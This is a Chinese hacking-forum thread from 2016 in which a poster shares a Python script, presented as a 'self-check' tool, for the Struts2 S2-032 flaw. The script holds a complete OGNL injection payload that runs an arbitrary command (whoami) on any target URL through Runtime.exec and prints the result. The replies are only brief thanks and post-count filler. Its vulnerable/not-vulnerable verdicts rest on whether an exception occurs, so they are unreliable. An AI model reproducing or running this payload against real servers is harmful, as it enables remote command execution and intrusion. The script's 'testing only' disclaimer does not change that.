查看: 692136|回复: 3188

[Python] 简易版S2-032自查脚本

[复制链接]
发表于 2016-5-2 23:30:45 | 显示全部楼层 |阅读模式
今两天各大漏洞平台都被Struts2命令执行漏洞所刷屏了,网上有各种利用代码,看到他们的都很复杂,索性就写了一个Python脚本给各位测试吧!

本脚本仅用于安全测试,不得用于非法用途,否则自负!

[Python] 纯文本查看 复制代码
#! /usr/bin/env python
# coding:utf-8

##############################################
#
# 简易版S2-032自查脚本 V1.0
#
# 20160428 V1.0
#
# By:EvillenG    QQ:2264672229
#
##############################################

import urllib
import sys

print
print "简易版S2-032自查脚本 V1.0 By:EvillenG"
print
print "本脚本仅用于安全测试,不得用于非法用途,否则自负!"
print

def getHtml(url):
    req = urllib.urlopen(url)
    date = req.read()
    print date


def main():

    try:
        comm = raw_input("URL:")
        get_exp = comm + "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\A&ppp=%20&encoding=UTF-8"
        targetHtml = getHtml(str(get_exp))

        print targetHtml
        print
        print "此网站存在Struts2命令执行漏洞,请尽快打补丁,谢谢!"
        print
    except:
        print
        print "此网站不存在Struts2命令执行漏洞,请放心使用,谢谢!"
        print


if __name__=='__main__':

    main()


10.png
回复

使用道具 举报

发表于 2016-5-2 23:42:00 | 显示全部楼层
我是来水经验的……
回复 支持 反对

使用道具 举报

发表于 2016-5-3 02:40:37 | 显示全部楼层
支持,看起来还是可以的
回复 支持 反对

使用道具 举报

发表于 2016-5-3 02:41:17 | 显示全部楼层
支持,看起来还是可以的
回复 支持 反对

使用道具 举报

发表于 2016-5-3 04:19:16 | 显示全部楼层
支持,看起来还是可以的
回复 支持 反对

使用道具 举报

发表于 2016-5-3 06:23:02 | 显示全部楼层
我是来水经验的……
回复 支持 反对

使用道具 举报

发表于 2016-5-3 07:21:35 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2016-5-3 08:19:37 | 显示全部楼层
支持,看起来还是可以的
回复 支持 反对

使用道具 举报

发表于 2016-5-3 09:30:14 | 显示全部楼层
非常感谢
回复 支持 反对

使用道具 举报

发表于 2016-5-3 12:34:32 | 显示全部楼层
支持,看起来还是可以的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 02:56 , Processed in 0.018992 second(s), 10 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部